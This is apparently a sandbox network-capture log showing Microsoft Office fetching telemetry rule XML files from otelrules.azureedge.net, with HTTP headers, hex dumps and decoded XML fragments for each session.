                                                                                                                                                                                                                                                                                        2024-11-11 15:37:11 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        113192.168.2.44987013.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:11 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:11 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1390
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE3002601"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 1815f1f4-001e-0028-79d5-33c49f000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153711Z-174f7845968jrjrxhC1EWRmmrs000000055000000000rkhu
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:11 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        114192.168.2.44986813.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:11 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:11 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1360
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 65803071-501e-000a-4fd5-330180000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153711Z-174f784596886s2bhC1EWR743w000000056000000000bfys
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:11 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        115192.168.2.44987113.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:11 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:11 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1401
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                                                                                                                        x-ms-request-id: b85e0691-b01e-0098-78d5-33cead000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153711Z-174f7845968v79b7hC1EWRu01s00000004ug000000004zg2
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:11 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        116192.168.2.44987613.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:12 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:12 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 6565db8d-b01e-0084-61d5-33d736000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153712Z-174f7845968glpgnhC1EWR7uec000000055g00000000t5hk
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:12 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        117192.168.2.44987313.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:12 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:12 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1391
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 2ce92287-101e-007a-6fd5-33047e000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153712Z-174f7845968vwdr7hC1EWRsh3w00000004z000000000r1hh
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:12 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        118192.168.2.44987213.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:12 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:12 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1364
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 5ac3f861-801e-008f-21d5-332c5d000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153712Z-174f7845968frfdmhC1EWRxxbw000000055000000000gg1w
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:12 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        119192.168.2.44987413.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:12 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:12 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1354
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 5fef6463-301e-0051-7dd5-3338bb000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153712Z-174f7845968nxc96hC1EWRspw800000004u000000000kdtg
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:12 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        120192.168.2.44987513.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:12 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:12 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                                                                                                                        x-ms-request-id: d9046763-101e-00a2-1bd5-339f2e000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153712Z-174f7845968swgbqhC1EWRmnb4000000058000000000fs0b
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:12 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        121192.168.2.44987713.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:12 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:12 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1399
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
